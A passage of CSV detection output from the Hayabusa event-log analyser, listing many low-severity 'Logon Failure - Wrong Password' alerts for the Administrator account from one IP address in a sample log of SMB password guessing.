+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8tGAdT1CBRYRatVA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:34.925 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K0h9ulMPWtj8bEKI | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:35.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eLyLMNv6cOp3sgrq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:35.098 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KIAOs16X8nFxV45x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:35.150 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z4EbyEaUxUEyuiY6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:35.200 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SDnW5GABBLbe6eZ7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:35.258 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GublgQLD3RXQNmkX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:35.301 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: 2BQRppHTUHAoWPe4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:35.352 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gnh6HFlIW1zWEBu5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:35.402 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ulbcy5PWLYUm5Sy0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:35.449 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L8rkZ7iBMam5o8VJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:35.493 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n39Zox0PFeNirzyT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:35.543 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3u3YUCKxEo5pnKJX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:51:35.589 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wen3pHM88kSRkHNf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:35.625 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dGDHJ4KMm2zEMV0b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:35.673 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lKZAB1nfXPYSLxsE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:35.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tYkOsX0XDpkdvp01 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:35.779 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r9y7HjOeGPcrdj1c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:35.823 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RLwh8Lg3nvbm8Q2p | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:35.874 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QoMkBcp8ouIgpX4m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:35.918 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2UnrDiOAOec5DQGQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:35.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UxJGLShj5EDKLSDZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:36.033 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iWhaz8W0VLQdXKWN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:36.081 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 82YDxSIBnCAqdK4c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:36.124 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: 795b7XqsxokIGJyM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.172 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1BmnyTsmP2XqMzf1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.221 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NB3xsYe3RcPXhDib | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.264 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yxN9i8exdO2h4oa7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vjcQaeuo4f8wFXhv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.351 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zCzr77BhliB4KKeb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.401 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z558005RepKaO1zZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.448 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9HFzW25mJz4JLkv7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.490 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y7J8m97GQWt2cbSs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.545 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XJrVwcpABBaZ8cyY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.585 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VcDw3I4BaFLdIeCZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.637 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: egEpV9aAuCFjwx2I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.677 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: th0ZLWF4YeOaNnkK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ahrOLfdy6DCQ9SfO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.751 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xiooSdP5eib8PUE3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.794 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s6nQ2jp9IGYnGeyD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.839 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ejMtyR5QNdJFhw1W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.873 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e50kO0aVhfw5np5T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.913 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 176XyLw6IhEI6NuD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KXCzCSSFvpbWNJFd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.993 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XhHRuZYlH8hekaKc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.026 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZGIUBFRMQ3OBbOA0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.077 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R7CTT5g1w58eRRlS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.117 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JmVccmad66uOK9ox | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.163 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t1jlT6kEcs14dcNZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.209 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rBty5jOGkkZSZEyD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.245 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0Ci7YUsO5MtFkDSW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.347 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 12JToliq9mmAuMTQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.381 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lw9AgAvBGWoXBlim | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.418 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ReGDyvRpGknAKqqB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.469 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6mdUn8na4asRfpJP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.528 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b7Wm5p4HnNCbkyh2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.585 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MQZwerVd6E08X8Ou | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.625 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dbDjtLKoX5Q77bn5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.669 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O7BNKHiPjzJKCaDk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.714 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HHqBI8bzZn5VO9gq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.757 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xz2ZO3b3QSh6Rdqt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.797 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IEfdhrwbTfCpCXKC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.844 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kc0LuQzAmQTIF1X3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.896 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WMZ70YmzpVp2h8mY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FFVr3Amq6mA3umiu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:37.985 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hnN15vqZcww8pqTK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.027 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sSuMRF1txQ9g2Mwi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.073 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tUuapChhs4CGO1cS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.119 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dIMr0hjIkwD8AaEG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.173 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8ww9HMQX0cqmolYQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.210 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XJRRZ5e9lARVZDar | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.260 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VvUzVoSLqFPAXSWE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.304 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SMMgPu1VJIjAWPDW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.337 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I1JjIa4nOKDTLuAD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:38.377 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0J0GJIm1UUXHH9QJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
